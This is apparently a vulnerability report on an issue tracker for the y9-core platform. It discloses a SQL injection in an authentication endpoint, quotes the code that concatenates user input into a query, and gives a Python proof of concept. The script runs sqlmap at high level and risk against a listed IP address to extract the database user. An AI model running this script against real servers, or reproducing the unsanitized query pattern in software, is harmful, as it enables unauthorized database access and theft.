[Bug]: SQL injection on /server-platform/services/rest/auth/authenticate3 #2
Description
这个问题是否已经存在?
- 我已经搜索过现有的问题 (https://gitee.com/risesoft-y9/y9-core/issues)
如何复现
summary
In the latest version, a parameter passed to the endpoint /server-platform/services/rest/auth/authenticate3 are user-controllable and not sanitized, and no prepared statements are used when executing the final SQL query, resulting in a SQL injection vulnerability. Attackers can exploit this vulnerability to obtain sensitive data from the database and even gain complete control of the server.
the vulnerability is also affecting to the endpoints:
- /server-platform/services/rest/auth/authenticate5
- /server-platform/services/rest/v1/auth/authenticate3
details
- SINK
// source-code/src/main/java/net/risesoft/util/Y9PlatformUtil.java#L80C4-L84C5
80→ public static List getTenantByLoginName(String loginName) {
81→ String sql = "select id from Y9_COMMON_TENANT t where t.SHORT_NAME='" + loginName + "'";
82→ List<String> tenantIds = getJdbcTemplate4Public().queryForList(sql, String.class);
83→ return tenantIds;
84→ }
- SOURCE
// source-code/src/main/java/net/risesoft/api/v0/org/AuthenticateApiImpl.java#L29C4-L37C5
29→ public Message authenticate3(@RequestParam("tenantShortName") @NotBlank String tenantShortName, @RequestParam("loginName") @NotBlank String loginName, @RequestParam("password") @NotBlank String password) {
30→ List<String> tenantIds = Y9PlatformUtil.getTenantByLoginName(tenantShortName);
31→ if (!tenantIds.isEmpty()) {
32→ String tenantId = (String)tenantIds.get(0);
33→ Y9LoginUserHolder.setTenantId(tenantId);
34→ }
35→
36→ return this.authService.authenticate3(tenantShortName, loginName, password);
37→ }
POC
import os
import shlex
import shutil
import subprocess
import traceback
output_dir = r'/tmp/sqlmap_cache_ab1c2a1690d640f4bbed38eaebd939de'
os.makedirs(output_dir, exist_ok=False)
with open(os.path.join(output_dir, "__init__.py"), "w") as f:
pass
with open(os.path.join(output_dir, "tamper.py"), "w") as f:
f.write('')
request_text = r'''POST http://34.127.101.91:40103/server-platform/services/rest/auth/authenticate3 HTTP/1.1
Host: 34.127.101.91:40103
Content-type: application/x-www-form-urlencoded
User-agent: oxpecker
Content-length: 85
tenantShortName=test_tenant_short_name*&loginName=test_login&password=test_password'''
with open(os.path.join(output_dir, "request.txt"), "w") as f:
f.write(request_text)
sqlmap_command_args = shlex.split(r'''sqlmap -r /tmp/sqlmap_cache_ab1c2a1690d640f4bbed38eaebd939de/request.txt --level 5 --risk 3 -v 3 --threads 8 --output-dir /tmp/sqlmap_cache_ab1c2a1690d640f4bbed38eaebd939de --answers="do you want to try URI injections in the target URL itself?=n,custom injection marker=y,skip test payloads specific for other DBMSes=y,is vulnerable. Do you want to keep testing the others=n" --current-user --flush-session --batch --ignore-stdin''')
print(subprocess.run(
sqlmap_command_args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, # Merge stderr into stdout
text=True,
check=False,
timeout=600
).stdout)
try:
shutil.rmtree(output_dir)
except Exception:
print(r"Failed to remove /tmp/sqlmap_cache_ab1c2a1690d640f4bbed38eaebd939de")
traceback.print_exc()
预期结果
NULL
实际结果
NULL
截图或视频
[在这里上传图片]
版本
<=9.6.7